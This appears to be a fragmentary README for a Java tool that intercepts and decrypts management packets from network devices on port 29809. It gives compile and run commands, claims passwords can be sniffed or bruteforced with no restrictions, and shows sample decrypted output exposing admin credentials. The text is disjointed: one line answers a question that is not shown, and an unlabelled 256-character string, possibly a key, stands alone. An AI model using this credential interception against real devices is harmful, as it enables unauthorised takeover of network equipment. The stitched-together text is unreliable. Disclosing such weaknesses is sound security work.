Compile:
cd src
javac Intercept.java
Run (for example):
cd src
java Intercept
Yes, after intercepting or bruteforcing the password (default is admin:admin on all devices, the maximum password length is 16) without any restrictions.
Ei2HNryt8ysSdRRI54XNQHBEbOIRqNjQgYxsTmuW3srSVRVFyLh8mwvhBLPFQph3ecDMLnDtjDUdrUwt7oTsJuYl72hXESNiD6jFIQCtQN1unsmn3JXjeYwGJ55pqTkVyN2OOm3vekF6G1LM4t3kiiG4lGwbxG4CG1s5Sli7gcINFBOLXQnPpsQNWDmPbOm74mE7eyR3L7tk8tUhI17FLKm11hrrd1ck74bMw3VYSK3X5RrDgXelewMU6o1tJ3iX
<header>[<type><length><value>]
The body may contain more than one data block called "TLV".
The password is transmitted on each configuration change request.
===NEW PACKET ON PORT 29809 FROM /172.19.79.55
Decrypted data:
Version:1
OPCODE:3
MAC:F4F26DD27F12
HOST MAC:080027D3524B
SEQUENCE NUMBER:618
ERROR CODE (7 or 8 are somehow bad):0
LENGTH:56
FRAGMENT OFFSET:0
TOKEN ID:27750
CHECKSUM (apparently not implemented):0
BODY:
-START TLV-
TYPE:512 (Username)
LENGTH:6
BODY:61646D696E00 (admin::StringType)
-START TLV-
TYPE:514 (Password)
LENGTH:6
BODY:61646D696E00 (admin::StringType)
-START TLV-
TYPE:-1 (Unknown)
LENGTH:0
BODY: (::unknown)
RAW: 0103F4F26DD27F12080027D3524B026A000000000038000000006C66000000000200000661646D696E000202000661646D696E00FFFF0000